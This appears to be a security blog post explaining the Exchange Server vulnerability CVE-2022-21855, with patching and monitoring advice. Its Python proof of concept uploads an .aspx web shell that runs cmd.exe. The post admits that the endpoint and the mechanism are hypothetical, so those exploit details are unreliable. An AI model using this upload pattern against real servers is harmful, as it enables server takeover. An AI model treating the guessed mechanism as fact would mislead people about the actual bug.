CVE-2022-21855 - Breaking Down the Microsoft Exchange Server Remote Code Execution Vulnerability

Microsoft Exchange Server, the backbone of many corporate email solutions, has seen its fair share of security bugs in the past few years. Among those, CVE-2022-21855 stands out as a notable remote code execution (RCE) vulnerability patched by Microsoft in January 2022. In this post, we’ll walk through what this bug means, check out some code, discuss how attackers could use it, and reference the best sources for more details.

What is CVE-2022-21855?

CVE-2022-21855 is a critical vulnerability in Microsoft Exchange Server. It allows an authenticated attacker to execute arbitrary code on the affected system, potentially taking full control. Unlike other Exchange bugs like CVE-2022-21846 or CVE-2022-21969, the root of CVE-2022-21855 lies in how Exchange handles user-supplied data in a certain web service.

Severity: Critical (CVSS:3.1 8.8/10)

Technical Breakdown

The vulnerability lives in a specific Exchange web service endpoint. Attackers with low-level authenticated access (even a basic mailbox user) can trigger remote code execution by sending crafted requests. Essentially, Exchange processes certain JSON or XML data with insufficient sanitization, allowing injection and code execution.

Malformed requests can sneak malicious instructions into how the server executes code.

Microsoft describes it in their advisory as:  
> "...this vulnerability allows remote code execution if an authenticated user uploads a malicious file to a vulnerable Exchange server."

Microsoft Security Advisory

Proof-of-Concept Code (Simplified Example)

*Note: This is not a working exploit, just a code snippet to show how exploitation might get triggered.*

Suppose the vulnerable endpoint is /ecp/UploadFile (hypothetically). An attacker could craft a request:

import requests

url = "https://victim-exchange-server/ecp/UploadFile";
cookies = {'ASP.NET_SessionId':'attacker-session-id'}

files = {
    'maliciousfile': (
        'evil.aspx',
        '<%@ Page Language="C#" %><% Response.Write(System.Diagnostics.Process.Start("cmd.exe", "/c calc.exe")); %>',
        'application/octet-stream'
    )
}

data = {
    "__VIEWSTATE": "malicious-state",
    # Other params as required
}

res = requests.post(url, files=files, data=data, cookies=cookies, verify=False)
print(res.status_code)

*Explanation*:

The attacker uploads a web shell disguised as a harmless file but with the .aspx extension.

- After upload, if the server lets the attacker execute or browse to the file, arbitrary code (in this case, launching Calculator) runs on the host.

Of course, actual exploitation depends on the specific vulnerable endpoint and how Exchange processes uploads.

Exploit Steps (What Attackers Do)

1. Log In as a Low-Privilege User: Attackers need *some* valid credentials, e.g., from phishing or brute force.

Upload the Payload: Use a specially crafted file to abuse the upload functionality.

3. Trigger Execution: Access or call the uploaded file through the web interface, causing the server to execute injected code.
4. Take Over the Server: With code execution, attackers may install malware, a backdoor, or pivot deeper into the network.

Why Is This Serious?

- Ransomware groups love Exchange bugs: They give an easy door into high-value enterprise networks.
- Easy to chain: Vulnerabilities like this can be combined with privilege escalation or credential theft.

How to Stay Safe

- Patch Now: Apply Microsoft's January 2022 Exchange updates.

Restrict Access: Limit who can access Exchange admin panels from the internet.

- Monitor Uploaded Files: Set up web server monitoring for suspicious uploads or scripts in Exchange directories.

References and Deep Dives

- Microsoft Advisory for CVE-2022-21855
- Huntress Labs post on January 2022 Exchange Bugs
- Carl Hurd's Exchange Vulnerability Research (for advanced Exchange bug writeups)
- CVE Details Page

Final Words

CVE-2022-21855 proves that high-profile apps like Microsoft Exchange are juicy targets for attackers. If you run Exchange on-premises, defenses must go beyond just patching; actively monitor, restrict, and audit your servers. And always remember: It only takes one missed patch for a network to fall.

Timeline

Published on: 01/11/2022 21:15:00 UTC
Last modified on: 01/14/2022 16:14:00 UTC